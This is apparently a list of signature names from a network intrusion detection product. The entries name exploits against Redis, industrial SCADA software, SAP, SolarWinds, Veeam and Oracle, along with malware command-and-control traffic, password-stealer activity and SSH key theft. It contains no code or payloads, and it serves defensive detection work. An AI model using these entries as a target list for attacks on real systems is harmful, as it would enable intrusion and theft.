Generic_CS-Redis-Getkeysusingkeyspecs-Heap-Buffer-Overflow
Generic_CS-Redis-Hrandfield-Zrandmember-Command-Integer-Overflow
Generic_CS-Redis-HyperLogLog-Hllcount-Stack-Buffer-Overflow
Generic_CS-Redis-HyperLogLog-Hllsparsetodense-Heap-Buffer-Overflow
Generic_CS-Redis-Lua-Sandbox-Escape-CVE-2022-0543
Generic_CS-Redis-Lua-Scripting-Component-Getnum-Integer-Overflow
Generic_CS-Redis-Msetnx-Command-Denial-Of-Service
Generic_CS-Redis-Replication-Code-Execution
Generic_CS-Redis-Scan-Keys-Command-Denial-Of-Service
Generic_CS-Redis-Setrange-Sort-Command-Integer-Overflow
Generic_CS-Redis-SSH-Authorized-Keys-Overwrite
Generic_CS-Redis-Unauthenticated-Code-Execution
Generic_CS-Redis-Xautoclaim-Command-Count-Integer-Overflow
Generic_CS-Redline-Password-Stealer-Infection-Traffic
Generic_CS-Remcos-RAT-C2-Traffic
Generic_CS-Remote-Desktop-Code-Execution-Vulnerability
Generic_CS-Remote-Desktop-EsteemAudit-Client-Request
Generic_CS-Remote-Desktop-Protocol-Vulnerability
Generic_CS-Remote-Mouse-RCE
Generic_CS-RevengeRAT-Malware-C2-Traffic
Generic_CS-Rockwell-Automation-Rslinx-Classic-Cip-Sendrrdata-Heap-Buffer-Overflow
Generic_CS-Rockwell-Automation-Rslinx-Classic-Forward-Open-Electronic-Key-Stack-Buffer-Overflow
Generic_CS-Rockwell-Automation-Rslinx-Ethernet-IP-SendUnitData-DoS
Generic_CS-Rockwell-Automation-RSLogix-5000-RsvcHost.exe-Denial-Of-Service
Generic_CS-Rockwell-Automation-Thinmanager-CVE-2023-27855-Directory-Traversal
Generic_CS-Rockwell-Automation-Thinmanager-Denial-Of-Service-CVE-2023-27857
Generic_CS-Rockwell-Automation-Thinmanager-Thinserver-Directory-Traversal
Generic_CS-Rockwell-Automation-Thinmanager-Thinserver-Monitor-Thread-Out-Of-Bounds-Read
Generic_CS-Rockwell-Automation-Thinmanager-Type-13-Synchronization-Integer-Overflow
Generic_CS-Rockwell-Automation-Thinmanager-Type-17-Monitor-Missing-Authorization
Generic_CS-Rockwell-Automation-Thinmanager-Type-21-Synchronization-Directory-Traversal
Generic_CS-Rockwell-Automation-Thinmanager-Type-38-Synchronization-Directory-Traversal
Generic_CS-Rockwell-RSLogix-Heap-Overflow-Vulnerability
Generic_CS-RPC-Ypupdated-Arbitrary-Command-Execution
Generic_CS-Rpc445-MS03-049
Generic_CS-RSH-Authentication-Scanner-Vulnerability
Generic_CS-RSYNC-Arbitrary-File-Overwriting
Generic_CS-Rsync-Receive_Xattr-Heap-Based-Buffer-Overread
Generic_CS-Rsyslog-Pri-Value-Parsing-Integer-Overflow-Denial-Of-Service
Generic_CS-RTSP-Describe-Request-Long-URI-Header
Generic_CS-Sage-Saleslogix-GetConnection-Account-Disclosure
Generic_CS-Sage-X3-Administration-Service-Authentication-Bypass-Command-Execution
Generic_CS-SaltStack-Salt-Authorization-Bypass
Generic_CS-SaltStack-Salt-Clearfuncs-Directory-Traversal
Generic_CS-Sangoma-Asterisk-Command-Execution
Generic_CS-SAP-Business-One-License-Manager-Buffer-Overflow
Generic_CS-SAP-Business-One-License-Manager-Buffer-Overflow-2
Generic_CS-SAP-Gateway-Remote-Code-Execution
Generic_CS-SAP-GUI-Regsvr32.exe-Rule-Security-Policy-Bypass
Generic_CS-SAP-Netweaver-Adiexecblkconv-Message-Server-Buffer-Overflow
Generic_CS-SAP-Netweaver-Diagieventsource-Denial-Of-Service
Generic_CS-SAP-Netweaver-Diagtracehex-Denial-Of-Service
Generic_CS-SAP-Netweaver-Dispatcher-Stack-Buffer-Overflow
Generic_CS-SAP-Netweaver-Enqueue-Server-DoS
Generic_CS-SAP-Netweaver-Message-Server-Memory-Corruption
Generic_CS-SAP-Sybase-Esp-Parse-Unsafe-Pointer-Dereference
Generic_CS-SAP-Sybase-Event-Stream-Processor-Esp_Parse-Connection-Unsafe-Pointer-Dereference
Generic_CS-SAP-Sybase-Event-Stream-Processor-Esp_Parse-Connection-Vulnerability
Generic_CS-Satel-Iberia-SenNet-Command-Injection
Generic_CS-Scadatec-Limited-Procyon-Buffer-Overflow
Generic_CS-Schneider-Electric-Apc-Easy-UPS-Online-Getmacaddressbyip-Command-Injection
Generic_CS-Schneider-Electric-C-Bus-Toolkit-Access-Save-Command-Directory-Traversal
Generic_CS-Schneider-Electric-C-Bus-Toolkit-File-Delete-Command-Arbitrary-File-Delete
Generic_CS-Schneider-Electric-C-Bus-Toolkit-File-Download-Command-Directory-Traversal
Generic_CS-Schneider-Electric-C-Bus-Toolkit-File-Upload-Project-Name-Directory-Traversal
Generic_CS-Schneider-Electric-C-Bus-Toolkit-FILE-UPLOAD-Unrestricted-File-Upload
Generic_CS-Schneider-Electric-C-Bus-Toolkit-Project-Restore-Information-Disclosure
Generic_CS-Schneider-Electric-IGSS-Dc-Opcode-101-Heap-Buffer-Overflow
Generic_CS-Schneider-Electric-IGSS-Dc-Opcode-60-Arbitrary-File-Deletion
Generic_CS-Schneider-Electric-IGSS-IGSSdataServer-CVE-2022-24313-Stack-Buffer-Overflow
Generic_CS-Schneider-Electric-IGSS-IGSSdataServer-Opcode1-Out-Of-Bounds-Write
Generic_CS-Schneider-Electric-IGSS-IGSSdataserver.exe-Almnote-Integer-Overflow
Generic_CS-Schneider-Electric-IGSS-IGSSdataserver.exe-CVE-2022-24315-Out-of-Bounds-Read
Generic_CS-Schneider-Electric-IGSS-IGSSdataserver.exe-Opcode-5-Out-Of-Bounds-Write
Generic_CS-Schneider-Electric-IGSS-IGSSdataserver.exe-Opcode-6-Out-Of-Bounds-Write
Generic_CS-Schneider-Electric-IGSS-IGSSupdateservice-Directory-Traversal
Generic_CS-Schneider-Electric-IGSS-Opcode2-Out-Of-Bounds-Write
Generic_CS-Schneider-Electric-Indusoft-Web-Studio-Remote-Agent-Remote-Code-Execution
Generic_CS-Schneider-Electric-Indusoft-Web-Studio-Remote-Code-Execution-CVE-2018-8840
Generic_CS-Schneider-Electric-Interactive-Graphical-SCADA-System-Buffer-Overflow
Generic_CS-Schneider-Electric-SCADA-Expert-ClearSCADA-Authentication-Bypass
Generic_CS-Schneider-Electric-Unity-Pro-Denial-Of-Service
Generic_CS-Schneider-Electric-Web-Designer-ServerSimulator-RCE
Generic_CS-SCO-Unix-Calserver-Buffer-Overflow
Generic_CS-Shared-Variable-Fingerprints
Generic_CS-ShixxNOTE-6.net-Font-Field-Overflow
Generic_CS-Sielco-Sistemi-Winlog-Pro-Malformed-Packet-Stack-Buffer-Overflow
Generic_CS-Sielco-Sistemi-Winlog-RunTime.exe-Malformed-Packet-Parsing-Remote-Overflow
Generic_CS-Sielco-Sistemi-Winlog-RunTime.exe-Malformed-Packet-Parsing-Remote-Overflow-2
Generic_CS-Siemens-Automation-License-Manager-Almsrv64x.exe-Integer-Overflow
Generic_CS-Siemens-FactoryLink-Logging-Path-Param-Buffer-Overflow
Generic_CS-Siemens-SIMATIC-WinCC-Flexible-Runtime-Stack-Buffer-Overflow
Generic_CS-Siemens-Tecnomatix-FactoryLink-CSService-File-Download
Generic_CS-Siemens-Tecnomatix-FactoryLink-Multiple-Buffer-Overflows
Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Arbitrary-File-Creation
Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Server-Denial-Of-Service
Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Server-Heap-Buffer-Overflow
Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Server-Integer-Overflow
Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Server-Memory-Access-Error
Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Server-Traversal
Generic_CS-Smart-Software-Solutions-Codesys-Gateway-Stack-Buffer-Overflow
Generic_CS-Solarwinds-Dameware-Mini-Remote-Control-CltDHPubKeyLen-Out-of-Bounds-Read
Generic_CS-Solarwinds-Dameware-Mini-Remote-Control-Rsapubkeylen-Heap-Buffer-Overflow
Generic_CS-Solarwinds-Dameware-Mini-Remote-Control-RsaSignatureLen-Out-of-Bounds-Read
Generic_CS-Solarwinds-Dameware-Sigpubkey-Heap-Buffer-Overflow
Generic_CS-Solarwinds-Log-And-Event-Manager-Static-Credentials
Generic_CS-Solarwinds-Network-Performance-Monitor-CVE-2022-38111-Insecure-Deserialization
Generic_CS-Solarwinds-Network-Performance-Monitor-CVE-2022-47503-Insecure-Deserialization
Generic_CS-Solarwinds-Network-Performance-Monitor-CVE-2023-23836-Insecure-Deserialization
Generic_CS-Solarwinds-Network-Performance-Monitor-Sqlfilescript-Insecure-Deserialization
Generic_CS-Solarwinds-NPM-BytesToMessage-Insecure-Deserialization
Generic_CS-Solarwinds-NPM-Propertybagjsonconverter-Insecure-Deserialization
Generic_CS-Solarwinds-Orion-NPM-Remote-Code-Execution
Generic_CS-Solarwinds-Orion-Platform-MSMQ-Insecure-Deserialization
Generic_CS-Spotify-Network-Connect
Generic_CS-Squid-SSL-Bump-Denial-Of-Service
Generic_CS-Srizbi-Spambot
Generic_CS-SSH-Private-Key-File-Transfer
Generic_CS-Streamcast-0.9.75-Buffer-Overflow
Generic_CS-StrongSwan-Certificate-And-Identification-Payload-Parsing-Buffer-Overflow
Generic_CS-Studio-Manager-Denial-of-Service
Generic_CS-Sun-Java-System-Web-Server-Admin-Server-Denial-Of-Service
Generic_CS-Sun-Java-Web-Console-Login-Format-String-Vulnerability
Generic_CS-Sunway-ForceControl-Denial-Of-Service-Vulnerability
Generic_CS-Sunway-ForceControl-Netdbserver-Integer-Signedness-Buffer-Overflow
Generic_CS-Sunway-ForceControl-SNMP-Netdbserver-Stack-Buffer-Overflow
Generic_CS-Suspicious-Java-Serialized-Object
Generic_CS-Suspicious-Request
Generic_CS-Sybase-Open-Server-Function-Pointer-Array-Code-Execution
Generic_CS-Sybase-Open-Server-Null-Byte-Stack-Memory-Corruption
Generic_CS-Sybase-SQL-Anywhere-Mobilink-Crafted-Strings-Buffer-Overflow
Generic_CS-Sydigu.A-Traffic
Generic_CS-Symantec-Alert-Management-System-Amssendalertack-Buffer-Overflow
Generic_CS-Symantec-Alert-Management-System-HNDLRSVC-Command-Execution
Generic_CS-Symantec-Alert-Management-System-Modem-String-Stack-Buffer-Overflow
Generic_CS-Symantec-Alert-Management-System-Pin-Number-Stack-Buffer-Overflow
Generic_CS-Symantec-Altiris-DS-SQL-Injection
Generic_CS-Symantec-AntiVirus-Intel-Alert-Handler-Service-Denial-Of-Service
Generic_CS-Symantec-Multiple-Products-Vrtsweb-Code-Execution
Generic_CS-Symantec-pcAnywhere-Buffer-Overflow
Generic_CS-Symantec-Veritas-Enterprise-Administrator-Vxsvc-Buffer-Overflow
Generic_CS-Synergy-Clipboard-Integer-Overflow
Generic_CS-System-Management-Homepage-Command-Injection
Generic_CS-Tarantool-Xrow_Header_Decode-Out-Of-Bounds-Read
Generic_CS-TeamViewer-Client-Startup
Generic_CS-Timbuktu-Pro-Directory-Traversal
Generic_CS-TinyIdentD-2.2-Stack-Buffer-Overflow
Generic_CS-Trace-Mode-UDP-Denial-Of-Service-2
Generic_CS-Trend-Micro-Control-Manager-Cmdhandlerlicensemanager-SQL-Injection
Generic_CS-Trend-Micro-Control-Manager-cmdHandlerStatusMonitor-SQL-Injection
Generic_CS-Trend-Micro-Control-Manager-Cmdhandlertvcscommander-SQL-Injection
Generic_CS-Trend-Micro-Control-Manager-Cmdprocessor-Addtask-Buffer-Overflow
Generic_CS-Trend-Micro-OfficeScan-Console-Authentication-Buffer-Overflow
Generic_CS-Tri-PLC-Crafted-Packet-Denial-Of-Service
Generic_CS-Tri-PLC-Nano-10-r81-Denial-Of-Service
Generic_CS-Tsunami-Linux-Trojan-Infection-Traffic
Generic_CS-UltraVNC-File-Transfer-Request-Handler-Stack-Based-Buffer-Overflow
Generic_CS-UltraVNC-VNC-Server-File-Transfer-Offer-Handler-Heap-Based-Buffer-Overflow
Generic_CS-Unisys-Business-Information-Server-Stack-Buffer-Overflow
Generic_CS-Unitrends-UEB-bpserverd-Authentication-Bypass
Generic_CS-Unix-Commands-Over-Plain-TCP
Generic_CS-Unix-System-Monitor-Messages
Generic_CS-UnrealIRCD-Backdoor-Command-Execution
Generic_CS-Valmet-DNA-Predictable-Key-Usage
Generic_CS-Veeam-Backup-And-Replication-Authentication-Bypass-CVE-2022-26501
Generic_CS-Veeam-Backup-And-Replication-CDbCryptoKeyInfo-Insecure-Deserialization
Generic_CS-Veeam-Backup-And-Replication-Cproxybinaryformatter-Arbitrary-File-Deletion
Generic_CS-Veeam-Backup-And-Replication-Credential-Disclosure-CVE-2023-27532
Generic_CS-Veeam-Backup-And-Replication-Insecure-Deserialization-CVE-2024-40711
Generic_CS-Veeam-Backup-And-Replication-Insecure-Deserialization-CVE-2025-23120
Generic_CS-Veeam-One-Agent-Deserialization
Generic_CS-Veritas-Backup-Exec-Agent-Error-Status-Denial-Of-Service
Generic_CS-Veritas-Backup-Exec-Agent-Improper-Authentication-Vulnerability-CVE-2021-27877
Generic_CS-Veritas-NetBackup-Remote-Command-Execution
Generic_CS-Veritas-NetBackup-Volume-Manager-Daemon-Buffer-Overflow
Generic_CS-Veritas-NetBackup-Volume-Manager-Daemon-Buffer-Overflow-2
Generic_CS-Veritas-NetBackup-Volume-Manager-Daemon-Token-Buffer-Overflow
Generic_CS-Vipa-Controls-Winplc7-Recv-Stack-Based-Buffer-Overflow
Generic_CS-Virut-Malware-C2-Traffic
Generic_CS-VMware-Authorization-Service-User-Credential-Parsing-DOS
Generic_CS-VMware-Authorization-Service-User-Credential-Parsing-DOS-2
Generic_CS-VMware-ESXi-Remote-Code-Execution-CVE-2021-21974
Generic_CS-VMware-Vcenter-Server-Authentication-Pointer-Out-of-Range-CVE-2023-20894
Generic_CS-VMware-Vcenter-Server-Jmx-Remote-Code-Execution
Generic_CS-VMware-VNC-Vmwdynresolution-Heap-Buffer-Overflow
Generic_CS-Voltronic-Power-Viewpower-Getmodbuspassword-Information-Disclosure
Generic_CS-Voltronic-Power-Viewpower-Pro-Selectdevicelistby-SQL-Injection
Generic_CS-Voltronic-Power-Viewpower-Pro-Selecteventconfig-SQL-Injection
Generic_CS-Voltronic-Power-Viewpower-Pro-UpdateManagerPassword-Authentication-Bypass
Generic_CS-W32/Brepibot.gen-Activity
Generic_CS-W32/Gaobot.worm.gen.by-Activity
Generic_CS-W32/Gaobot.worm.gen.d-Activity
Generic_CS-W32/Gaobot.worm.gen.e-Activity
Generic_CS-W32/Gaobot.worm.gen.j-Activity
Generic_CS-W32/Ircbot.gen-Connect
Generic_CS-W32/Ircbot.worm!ms05-039-Activity
Generic_CS-W32/Ircbot.worm.gen-Activity
Generic_CS-W32/Mydoom.bg@mm-Activity
Generic_CS-W32/Mytob.gen@mm-Activity
Generic_CS-W32/Nuwar@mm-Encrypted-Traffic
Generic_CS-W32/Oscarbot-Activity
Generic_CS-W32/Poebot.dam-Activity
Generic_CS-W32/Poebot.gen-Activity
Generic_CS-W32/Polybot.dr-Activity
Generic_CS-W32/Polybot.gen!irc-Activity
Generic_CS-W32/Polybot@mm-Activity
Generic_CS-W32/Sdbot.g.gen-Activity
Generic_CS-W32/Sdbot.worm.gen-Activity
Generic_CS-W32/Sdbot.worm.gen-Activity-2
Generic_CS-W32/Sdbot.worm.gen.bj-Activity
Generic_CS-W32/Sdbot.worm.gen.by-Activity
Generic_CS-W32/Spybot.worm.gen.bj-Connect
Generic_CS-W32/Spybot.worm.gen.e-Activity
Generic_CS-W32/Spybot.worm.gen.f-Activity
Generic_CS-W32/Spybot.worm.gen.o-Activity
Generic_CS-WellinTech-Kingscada-Kxnetdispose-Stack-Buffer-Overflow
Generic_CS-WellinTech-KingView-SCADA-Heap-Buffer-Overflow
Generic_CS-WellinTech-KingView-SCADA-Heap-Buffer-Overflow-2
Generic_CS-WellinTech-KingView-SCADA-Historyserver.exe-Heap-Buffer-Overflow
Generic_CS-Western-Digital-Arkeia-Remote-Code-Execution
Generic_CS-WhatsUp-Gold-Registry-Overwrite-CVE-2024-8785
Generic_CS-WinCC-Hmiload-Exe-Directory-Traversal
Generic_CS-WinComLPD-Total-Integer-Overflow
Generic_CS-Windows-Kerberos-Elevation-Of-Privilege-Vulnerability-CVE-2022-33679
Generic_CS-Windows-Kerberos-Security-Feature-Bypass-CVE-2025-29809
Generic_CS-Windows-Network-File-System-Remote-Code-Execution-Vulnerability-CVE-2023-24941
Generic_CS-Windows-RDP-CVE-2019-0708
Generic_CS-Windows-RDP-Information-Disclosure-Vulnerability-CVE-2020-16896
Generic_CS-Winhopstealer-Trojan
Generic_CS-Winos4.0-Post-Exploitation-Framework-C2-Traffic
Generic_CS-X.org-X-Font-Server-QueryXBitmaps-And-QueryXExtents-Integer-Overflow
Generic_CS-xArrow-SCADA-HMI-DoS-Ver1
Generic_CS-xArrow-SCADA-HMI-DoS-Ver2
Generic_CS-Xarvester-Spambot
Generic_CS-XLink-Omni-NFS-Server-Buffer-Overflow
Generic_CS-Xstream-Library-CVE-2020-26259-Arbitrary-File-Deletion
Generic_CS-Xymon-Daemon-Gather-Information
Generic_CS-Yoddos-Activity
Generic_CS-Yokogawa-CENTUM-CS3000-BKBCopyD.exe-Stack-Based-Buffer-Overflow
Generic_CS-Yokogawa-CENTUM-CS3000-BKHOdeq.exe-Stack-Based-Buffer-Overflow
Generic_CS-Yokogawa-CS3000-Buffer-Overflow
Generic_CS-Ysoserial-Generated-DotNet-Serialized-Object
Generic_CS-Zabbix-Agent-Command-Injection
Generic_CS-Zabbix-Arbitrary-Command-Execution
Generic_CS-Zabbix-Audit-Log-SQL-Injection-CVE-2024-22120
Generic_CS-Zabbix-Server-Active-Proxy-Trapper-Command-Injection
Generic_CS-Zend-Zend-Server-Java-Bridge-Remote-Code-Execution
Generic_CS-ZeroAccess-Traffic
Generic_CS-Zeromq-Libzmq-Curve-Server-Stack-Based-Buffer-Overflow
Generic_CS-Zeromq-Libzmq-V2_Decoder-Integer-Overflow
Generic_CS-Zoho-Manageengine-Datasecurity-Plus-Authentication-Bypass
Generic_CS-Zoho-Manageengine-Datasecurity-Plus-Directory-Traversal
Generic_CS_NanoCore-RAT-C2-Traffic
Generic_D-Link-Router-UPnP-Buffer-Overflow
Generic_Darwin-Streaming-Server-Null-Byte-DoS
Generic_Ethereal-AFP-Format-String
Generic_Ethereal-DistCC-BOF
Generic_Ethereal-IAPP-BOF
Generic_Firebird-SQL-op-connect-request-Denial-Of-Service
Generic_FreeBSD-Nfsd-Nfs-Mount-Request-Denial-Of-Service
Generic_FreeBSD-Nfsd-Nfs-Mount-Request-Denial-Of-Service-2
Generic_Gld-Greylisting-Server-Buffer-Overflow-Remote-System-Compromise
Generic_Gld-Greylisting-Server-Format-String-Remote-System-Compromise
Generic_Gnu-Radius-SQL-Accounting-Format-String-Vulnerability
Generic_GoodTech-Telnet-Administration-Web-Server-BOF
Generic_Google-Talk-Instant-Messaging-Network-Usage
Generic_HP-OpenView-Omniback-II-System-Compromise
Generic_HTTP-MySQL-yaSSL-CertDecoder::GetName-Buffer-Overflow
Generic_IBM-DB2-Database-Server-Connect-Request-Denial-Of-Service
Generic_IBM-DB2-Database-Server-Invalid-Data-Stream-Denial-Of-Service
Generic_IBM-Tivoli-Storage-Manager-Agent-Buffer-Overflow
Generic_IBM-Tivoli-Storage-Manager-Client-Dsmgent-Buffer-Overflow
Generic_IBM-Tivoli-Storage-Manager-Express-Backup-Heap-Corruption
Generic_IBM-Tivoli-Storage-Manager-Express-Backup-Heap-Corruption-2
Generic_IBM-Tivoli-Storage-Manager-Initial-Sign-On-Request-Buffer-Overflow
Generic_Ingres-Database-Uuid-From-Char-Stack-Buffer-Overflow
Generic_ISS-PAM-ICQ-BOF
Generic_ISS-PAM-ICQ-Parser-BOF
Generic_ISS-PAM-ICQ-Parsing-BOF-1
Generic_ISS-PAM-ICQ-Parsing-BOF-2
Generic_ISS-PAM-ICQ-Parsing-BOF-3
Generic_ISS-PAM-ICQ-Parsing-BOF-Witty
Generic_Kame-Ike-Racoon-Hash
Generic_Kerberos-Authentication-Failed
Generic_LDAP-Ssl-Library-Malformed-Client-Hello-DoS
Generic_Microsoft-Systems-Management-Server-DoS
Generic_Microsoft-Windows-DNS-Server-RPC-Management-Interface-Buffer-Overflow
Generic_Microsoft-Windows-Exchange-Denial-Of-Service
Generic_mIRC-PRIVMSG-Message-Processing-Buffer-Overflow
Generic_MIT-Kerberos-V5-KDC-Krb5_Unparse_Name-Heap-Overflow
Generic_Motorola-Timbuktu-Crafted-Login-Request-Buffer-Overflow
Generic_MS-Messenger-PNG-Image-BOF-MS05-009
Generic_MSDTC-BuildContextW-Memory-Corruption
Generic_MSDTC-BuildContextW-Memory-Corruption-2
Generic_MSRPC-CPS-Microsoft-Message-Queuing-Service-Queue-Name-Handling-Bind
Generic_MSRPC-CPS-MS-Host-Integration-Server-Vulnerable-Interface-Called
Generic_MSRPC-Messenger-BOF-MS03-043
Generic_MSRPC-Messenger-BOF-MS03-043-Breaking-Point
Generic_MSRPC-Windows-PnP-Buffer-Overflow
Generic_MSRPC-WKSSVC-MS03-049
Generic_MySQL-MaxDB-WebDBM-BOF
Generic_Network-Block-Device-Server-Long-Request-Buffer-Overflow
Generic_NgIRCd-Log-Resolver-Format-String-Vulnerability
Generic_Novell-eDirectory-dhost-Buffer-Overflow
Generic_Novell-NetMail-NMAP-Stor-Command-Buffer-Overflow
Generic_Novell-ZENworks-Pre-Authentication-Buffer-Overflow
Generic_OpenBSD-ISAKMP-DOS
Generic_OpenSSL-SSL3_Get_Key_Exchange-Use-After-Free-Memory-Corruption
Generic_OpenVMPS-Syslog-Format-String
Generic_Oracle-Bea-WebLogic-XSS
Generic_Oracle-Database-DBMS-Assert-Filter-Bypass
Generic_Oracle-Database-DBMS-Export-Extension-Package-Privilege-Escalation
Generic_Oracle-Database-DBMS-JVM-EXP-PERMS-System-Command-Execution
Generic_Oracle-Database-DBMS-Snap-Internal-Package-Buffer-Overflow
Generic_Oracle-Database-REPCAT-RPC.VALIDATE-REMOTE-RC-SQL-Injection
Generic_Oracle-Database-Server-CREATE-TABLES-SQL-Injection
Generic_Oracle-Database-Server-DBMS-AQELM-Package-Buffer-Overflow
Generic_Oracle-Database-Server-DBMS-CDC-Subscribe-Package-SQL-Injection
Generic_Oracle-Database-Server-DBMS-Metadata-Package-SQL-Injection
Generic_Oracle-Database-Server-LT.ROLLBACKWORKSPACE-SQL-Injection
Generic_Oracle-Database-Server-SDO-CS-TRANSFORM-LAYER-Buffer-Overflow
Generic_Oracle-Database-Server-SQL-Query-Directory-Traversal
Generic_Oracle-Database-Server-Sys-DBMS-Metadata-Util-SQL-Injection
Generic_Oracle-Database-Server-Sys-KUPV-SQL-Injection
Generic_Oracle-Database-SQL-Compiler-Access-Control-Security-Bypass
Generic_Oracle-Database-Sys-Pbsde-Init-Procedure-Buffer-Overflow
Generic_Oracle-Database-SYS.KUPW-WORKER-Package-MAIN-Procedure-SQL-Injection
Generic_Oracle-Secure-Backup-NDMP-Username-BOF
Generic_Oracle-Secure-Backup-observiced.exe-Buffer-Overflow-2
Generic_Oracle-SQL-Database-Compromise
Generic_Oracle-Sys-Pbsde-Init-BOF
Generic_Oracle-WebCache-Invalid-Request-DoS
Generic_PowerD-WHATIDO-Format-String
Generic_Quest-NetVault-Smartdisk-Libnvbasics.dll-Denial-Of-Service
Generic_RDP-Client-Remote-Code-Execution-MS09-044
Generic_RealNetworks-Helix-Server-Describe-Request-Buffer-Overflow
Generic_RealNetworks-Helix-Universal-Server-RTSP-Describe-BOF
Generic_RealVNC-Authentication-Bypass-Command-Execution
Generic_RealVNC-Authentication-Required
Generic_RealVNC-Connection-Attempt-Without-Authentication
Generic_Rlpr-Format-Strings-Attack
Generic_RPC-Cde-Dtspcd-Buffer-Overflow
Generic_RPC-Librpc.dll-Stack-Buffer-Overflow
Generic_RPC-Linux-Nfs-Mountd-Buffer-Overflow
Generic_RPC-Nfs-Export-Query
Generic_RPC-sadmind-ADM-Method-Buffer-Overflow
Generic_RPC-sadmind-NETMGT-PROC-Service-Buffer-Overflow
Generic_RPC-sadmind-RPC-Request-Integer-Overflow
Generic_RPC-Status-GHBN-Format-String
Generic_RPC-Xdr-Array-Buffer-Overflow-1
Generic_RTSP-RealNetworks-Helix-DNA-Server-Require-Header-Buffer-Overflow
Generic_Safenet-License-Manager-UDP-Buffer-Overflow
Generic_SAP-License-Manager-2005-Buffer-Overflow
Generic_SAP-MaxDB-Remote-Arbitrary-Commands-Execution
Generic_SMB2-Header-On-Plain-TCP
Generic_Solaris-sadmind-Weak-Authentication
Generic_SpamAssassin-Spamd-Vpopmail-And-Paranoid-Options-Code-Execution
Generic_SS-Adobe-ColdFusion-Dataservicescfproxy-Commons-Beanutils-Insecure-Deserialization
Generic_SS-Adobe-ColdFusion-Dataservicescfproxy-Rome-Framework-Insecure-Deserialization
Generic_SS-Adobe-Flash-Player-RTMP-Error-Message-Object-Type-Confusion
Generic_SS-Advantech-Domain-Focused-Configuration-Tool-DoS
Generic_SS-Agobot-IRC-Activity
Generic_SS-Ainslot.b-Traffic
Generic_SS-Apache-Struts-2-Commons-Fileupload-Insecure-Deserialization
Generic_SS-ATT-WinVNC-Client-Buffer-Overflow
Generic_SS-Automated-Solutions-Modbus_DoS
Generic_SS-Blizzard-World-Of-Warcraft
Generic_SS-Botnet-Al3na.hotgirls-Activity
Generic_SS-Botnet-Al3na.monster-Activity
Generic_SS-Botnet-Al3na.weakpatheticfool-Activity
Generic_SS-Botnet-Spybot-Activity
Generic_SS-CA-BrightStor-Arcserve-Backup-Discovery-Service-Buffer-Overflow
Generic_SS-Cesanta-Mongoose-Parse_MQTT-Out-Of-Bounds-Read
Generic_SS-Cleartext-SMTP-Commands-After-TLS-Handshake
Generic_SS-CoCSoft-Stream-Down-Buffer-Overflow
Generic_SS-Colloquy-IRC-Channel-Invite-Format-String-DoS
Generic_SS-Darkshell-Botnet-Activity
Generic_SS-DoblePulsar-PeddleCheap-Implant-Traffic
Generic_SS-Eaton-VURemote-DoS
Generic_SS-Ebury-SSH-Backdoor-Activity
Generic_SS-ElasticSearch-Throwableobjectinputstream-Insecure-Deserialization
Generic_SS-FinalDraft-C2-Activity
Generic_SS-Floodnet-IRC-Activity
Generic_SS-Forcepoint-SSLVPN-Authentication-Failure
Generic_SS-Fynloski-Botnet-Traffic
Generic_SS-Git-Submodules-Directory-Traversal
Generic_SS-Gt-Bot-Activity
Generic_SS-HTran-Connection-Bouncer-Error-Message
Generic_SS-ICONICS-Modbus-DoS
Generic_SS-Inductive-Automation-Ignition-OPC-UA-Client-Cross-Site-Scripting
Generic_SS-Internet-Explorer-HTML-Elements-Buffer-Overflow
Generic_SS-IRC-Scan-Activity
Generic_SS-Linux-Kernel-Libceph-Messenger_V2-Segment-Length-Signedness-Error
Generic_SS-Mcrat-Botnet-Activity
Generic_SS-Memcached-Server-Error-Response
Generic_SS-Microsoft-Ie-Body-Element-Use-After-Free
Generic_SS-Microsoft-Internet-Explorer-CVE-2010-3971
Generic_SS-Microsoft-Internet-Explorer-CVE-2010-3971-2
Generic_SS-Microsoft-Internet-Explorer-CVE-2010-3971-3
Generic_SS-Microsoft-Internet-Explorer-CVE-2010-3971-4
Generic_SS-Microsoft-Windows-Credssp-MITM-Code-Execution
Generic_SS-Microsoft-Windows-DHCP-Server-Failover-CVE-2023-38162-Denial-Of-Service
Generic_SS-Microsoft-Windows-KDC-Proxy-KpsSocketRecvDataIoCompletion-Integer-Overflow
Generic_SS-Microsoft-Windows-Nfs-Server-Null-Pointer-Dereference
Generic_SS-MOXA-Device-Manager-Tool-Buffer-Overflow
Generic_SS-MS-Forefront-Threat-Management-Gateway-Client-Remote-Code-Execution
Generic_SS-Novell-Groupwise-Messenger-HTTP-Response-Handling-Stack-Overflow
Generic_SS-NOVUS-NConfig-SEH-Buffer-Overflow
Generic_SS-Oracle-WebLogic-Server-Session-Fixation
Generic_SS-Phatbot-Trojan-Infection
Generic_SS-PoisonIvy-Activity
Generic_SS-Ponmocup-Activity
Generic_SS-PostgreSQL-Failed-Login
Generic_SS-Provectus-UI-For-Apache-Kafka-Jmx-Insecure-Deserialization
Generic_SS-Quagga-Hello
Generic_SS-Rdesktop-Process_Redirect_PDU-BSS-Overflow
Generic_SS-Recslurp-Botnet-Traffic
Generic_SS-SCADA-AspicManager-Denial-Of-Service
Generic_SS-Shared-Variables-Fingerprint
Generic_SS-Squid-Gopher-Protocol-Handling-Buffer-Overflow
Generic_SS-Squid-Proxy-Gopher-Response-Processing-Buffer-Overflow
Generic_SS-SSL-Certificate-In-Nonstandard-Port
Generic_SS-Suspicious-Git-Packfile-In-Server-Response
Generic_SS-Suspicious-Traffic
Generic_SS-Symantec-pcAnywhere-Server-Reply
Generic_SS-Text-File-In-HTTP-0.9-Response
Generic_SS-Tofsee-Activity
Generic_SS-UltraVNC-Client-Buffer-Overflow
Generic_SS-Veritas-Storage-Foundation-Scheduler-Service-Null-Session-Bypass
Generic_SS-Virut-Malware-C2-Traffic
Generic_SS-VLC-Media-Player-RTSP-Plugin-Stack-Buffer-Overflow
Generic_SS-Vobfus-Botnet-Request
Generic_SS-W32/Gaobot.worm.gen-Worm-IRC-Activity
Generic_SS-W32/Nuwar@mm-Encrypted-Traffic
Generic_SS-W32/Sdbot.worm.gen-Activity
Generic_SS-W32/Sdbot.worm.gen.bj-Activity
Generic_SS-W32/Sdbot.worm.gen.by-Activity
Generic_SS-Yahoo!-Messenger-File-Transfer-Filename-Spoofing
Generic_SS-Yoddos-Activity
Generic_SS-Z-Scada-Net2.0-0-Day
